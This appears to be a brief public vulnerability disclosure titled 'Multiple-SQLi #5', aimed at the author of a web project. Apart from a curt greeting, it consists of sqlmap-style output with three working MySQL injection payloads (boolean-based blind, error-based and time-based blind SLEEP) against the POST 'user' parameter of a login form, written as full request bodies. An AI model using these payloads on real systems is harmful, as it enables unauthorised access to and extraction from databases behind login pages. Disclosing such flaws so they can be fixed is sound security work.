
Multiple-SQLi #5

@nu11secur1ty


Hello Erick from America, you have a serious problem with the security of your system Erick!
Please fix it, or just terminate this project.
BR

---
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: user=bqxDgfIK' RLIKE (SELECT (CASE WHEN (8457=8457) THEN 0x627178446766494b ELSE 0x28 END)) AND 'BTvs'='BTvs&password=s9U!o7d!C0&btnlogin=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: user=bqxDgfIK' AND (SELECT 5004 FROM(SELECT COUNT(*),CONCAT(0x7178767071,(SELECT (ELT(5004=5004,1))),0x7171707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aQfu'='aQfu&password=s9U!o7d!C0&btnlogin=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=bqxDgfIK' AND (SELECT 8137 FROM (SELECT(SLEEP(7)))nCyy) AND 'vQsi'='vQsi&password=s9U!o7d!C0&btnlogin=
---
